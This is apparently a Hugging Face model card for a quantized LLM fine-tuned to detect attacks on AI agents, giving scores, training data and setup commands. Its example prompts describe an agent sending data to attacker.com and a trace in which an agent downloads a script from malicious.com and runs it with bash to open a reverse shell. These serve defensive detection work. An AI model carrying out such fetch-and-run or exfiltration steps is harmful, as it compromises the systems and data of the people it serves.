Agentic Safety Foundation-Sec V4 - GGUF

GGUF quantized model for efficient inference with llama.cpp, Ollama, and LM Studio. RON_AI_Safety_Watchdog_LLM_Logo3

🎯 Model Description

This is a Q4_K_M quantized version of Agentic Safety Foundation-Sec V4, specialized for:

  • πŸ”’ Agentic AI security analysis (prompt injection, goal hijacking, tool misuse)
  • πŸ“Š OpenTelemetry trace security monitoring
  • πŸ›‘οΈ Multi-agent attack detection
  • πŸ“‹ Security policy compliance (GDPR, HIPAA, PCI-DSS, SOC2)

πŸ“Š Performance

Metric Score
Overall Accuracy 74.29% (52/70)
Agentic AI Security 70.0% (14/20)
MMLU Computer Security 74.00%
MMLU Security Studies 72.24%
Model Size (Q4_K_M) ~4.9 GB

Category Breakdown

  • Access Control: 100.0% (3/3)
  • Security Operations: 85.7% (6/7)
  • Application Security: 83.3% (5/6)
  • Cryptography: 83.3% (5/6)
  • Threat Intelligence: 80.0% (8/10)
  • Security Fundamentals: 75.0% (6/8)
  • Agentic AI Security: 70.0% (14/20)
  • Network Security: 66.7% (4/6)

πŸš€ Quick Start

Ollama

# Create Modelfile
cat > Modelfile <<EOF
FROM ./agentic-safety-v4-q4_k_m.gguf

TEMPLATE """<|begin_of_text|><|start_header_id|>system<|end_header_id|>

You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security.<|eot_id|>
<|start_header_id|>user<|end_header_id|>

{{ .Prompt }}<|eot_id|>
<|start_header_id|>assistant<|end_header_id|>

"""

PARAMETER temperature 0.7
PARAMETER top_p 0.9
PARAMETER stop "<|eot_id|>"
PARAMETER stop "<|end_of_text|>"
EOF

# Create and run
ollama create agentic-safety-v4 -f Modelfile
ollama run agentic-safety-v4 "What is indirect prompt injection?"

llama.cpp

# Download model
wget https://huggingface.co/guerilla7/agentic-safety-v4-gguf/resolve/main/agentic-safety-v4-q4_k_m.gguf

# Run inference
./llama-cli \
  -m agentic-safety-v4-q4_k_m.gguf \
  -p "Analyze this security trace for threats: An agent fetched emails, executed curl to external-api.com, wrote sensitive data to /tmp/, then sent data to attacker.com. What attack occurred?" \
  -n 512 \
  --temp 0.7 \
  --top-p 0.9

LM Studio

  1. Download agentic-safety-v4-q4_k_m.gguf
  2. Import into LM Studio
  3. Set system prompt: "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."
  4. Use for security analysis and Q&A

Python (llama-cpp-python)

pip install llama-cpp-python
from llama_cpp import Llama

llm = Llama(
    model_path="agentic-safety-v4-q4_k_m.gguf",
    n_ctx=2048,
    n_threads=8,
    n_gpu_layers=35  # Adjust based on your GPU
)

response = llm.create_chat_completion(
    messages=[
        {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
        {"role": "user", "content": "What is the difference between tool misuse and tool poisoning in agentic AI systems?"}
    ],
    temperature=0.7,
    top_p=0.9,
    max_tokens=512
)

print(response['choices'][0]['message']['content'])

πŸ”§ Quantization Details

  • Original Model: Foundation-Sec-8B-Instruct (fine-tuned with QLoRA)
  • Quantization Method: Q4_K_M (4-bit, K-quant, medium)
  • Size: ~4.9 GB (vs ~16 GB FP16)
  • Quality Retention: ~97-98% of original accuracy
  • Inference Speed: 2-3x faster than FP16

Available Quantizations

Variant Size Use Case
Q4_K_M ~4.9 GB Recommended - Best quality/size balance
Q4_K_S ~4.6 GB Slightly smaller, minimal quality loss
Q5_K_M ~5.8 GB Higher quality, larger size
Q8_0 ~8.5 GB Near-original quality

πŸ“– Example Use Cases

1. Security Trace Analysis

Input:

Analyze this OpenTelemetry trace:
- Span 1: fetch_email(inbox) -> 15 emails
- Span 2: execute_tool(curl, 'https://malicious.com/script.sh') -> 200 OK
- Span 3: execute_tool(bash, 'script.sh') -> Reverse shell established

Output:

CRITICAL: Multi-stage attack detected
1. Attack Type: Command Injection + Tool Misuse
2. Severity: CRITICAL (CVSS 9.8)
3. Stages: Email enumeration β†’ Malicious script download β†’ Remote code execution
4. MITRE ATT&CK: T1059.004 (Command and Scripting Interpreter: Unix Shell)
5. Recommendations:
   - Block external script execution
   - Implement allowlist for curl destinations
   - Require human approval for bash tool invocation

2. Security Q&A

Input: "What is defense in depth for agentic systems?"

Output: "Defense in depth for agentic systems means implementing multiple layers of security controls: input validation (filter malicious prompts), tool authorization (restrict dangerous operations), output filtering (detect harmful responses), monitoring (trace analysis), and human oversight (approval for sensitive actions). No single control is perfect, so layered defenses ensure that if one fails, others catch the threat."

πŸŽ“ Training Details

Evolution

  • V2 Baseline: 80,851 examples β†’ 61.43% accuracy
  • V3 Targeted: +111 OWASP examples β†’ 67.14% accuracy
  • V4 Adversarial: +30 hard examples β†’ 74.29% accuracy

Training Data

  • Synthetic OpenTelemetry traces: 10,796
  • Core security datasets: 11,033 (AgentHarm, SafetyBench, PKU-SafeRLHF)
  • Policy compliance: 3,840 (GDPR, HIPAA, PCI-DSS, SOC2)
  • Attack patterns: 4,379 (multi-agent, jailbreak, code vulnerabilities)
  • Judge/eval datasets: 16,777 (Prometheus, HelpSteer, TruthfulQA, HaluEval)
  • Adversarial robustness: 3,000 (BeaverTails)
  • Synthetic expansions: 35,026 (Claude Sonnet 4.5)

Hardware

  • Platform: NVIDIA DGX Spark (Grace Blackwell, ARM64)
  • Training: QLoRA (4-bit NF4, rank 16)
  • Steps: 2,500 total (V2: 1,500, V3: 500, V4: 500)

βš–οΈ Limitations

  • Sample size: 70-question custom eval (20 agentic, 50 traditional)
  • Optimized for cybersecurity (may underperform on general tasks)
  • Training data: 43% synthetic (not production traces)
  • May miss novel attack patterns not in training data
  • Use as detection assist, not autonomous decision-maker

πŸ“œ License

Apache 2.0 (inherited from Foundation-Sec-8B-Instruct)

πŸ”— Links

πŸ“ Citation

@misc{agentic-safety-v4-gguf-2025,
  title={Agentic Safety Foundation-Sec V4 GGUF: Quantized Cybersecurity Model for Agentic AI},
  author={Ron F. Del Rosario | guerilla7},
  year={2025},
  publisher={Hugging Face},
  howpublished={\url{https://huggingface.co/guerilla7/agentic-safety-v4-gguf}}
}

πŸ‘€ Model Card Contact

Downloads last month
155
GGUF
Model size
8B params
Architecture
llama
Hardware compatibility
Log In to view the estimation

4-bit

Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support

Model tree for guerilla7/agentic-safety-gguf

Quantized
(10)
this model

Evaluation results